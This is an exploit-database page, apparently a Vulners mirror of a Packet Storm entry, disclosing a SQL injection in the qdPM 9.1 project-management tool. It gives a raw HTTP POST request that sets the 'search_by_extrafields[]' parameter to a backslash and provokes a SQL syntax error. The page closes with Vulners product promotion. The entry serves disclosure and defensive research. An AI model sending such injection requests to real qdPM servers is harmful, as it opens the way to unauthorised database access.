Lucene search
K

qdPM 9.1 SQL Injection

🗓️ 14 Feb 2019 00:00:00Reported by Mehmet EmirogluType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

qdPM 9.1 SQL Injection in search_by_extrafields[] paramete

Code
`===========================================================================================  
# Exploit Title: qdPM 9.1 - 'search_by_extrafields[]' SQL Injection  
# Date: 14-02-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: http://qdpm.net  
# Software Link: http://qdpm.net/download-qdpm-free-project-management  
# Version: v9.1  
# Category: Webapps  
# Tested on: Wamp64, @Win  
# Software description:  
Free project management tool for small team  
qdPM is a free web-based project management tool suitable for a  
small team working on multiple projects.  
It is fully configurable. You can easy manage Projects, Tasks and  
People. Customers interact  
using a Ticket System that is integrated into Task management.  
===========================================================================================  
# POC - SQLi  
# Parameters : search_by_extrafields[]  
# Attack Pattern : URL encoded POST input search_by_extrafields[] was set to \  
Error message found : You have an error in your SQL syntax  
# POST Request: http://localhost/qdpm/index.php/users  
===========================================================================================  
POST /qdpm/index.php/users HTTP/1.1  
Content-Length: 45  
Content-Type: application/x-www-form-urlencoded  
Referer: http://localhost/qdPM/  
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1  
Host: localhost  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21  
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*  
  
search[keywords]=&search_by_extrafields[]=%5c  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation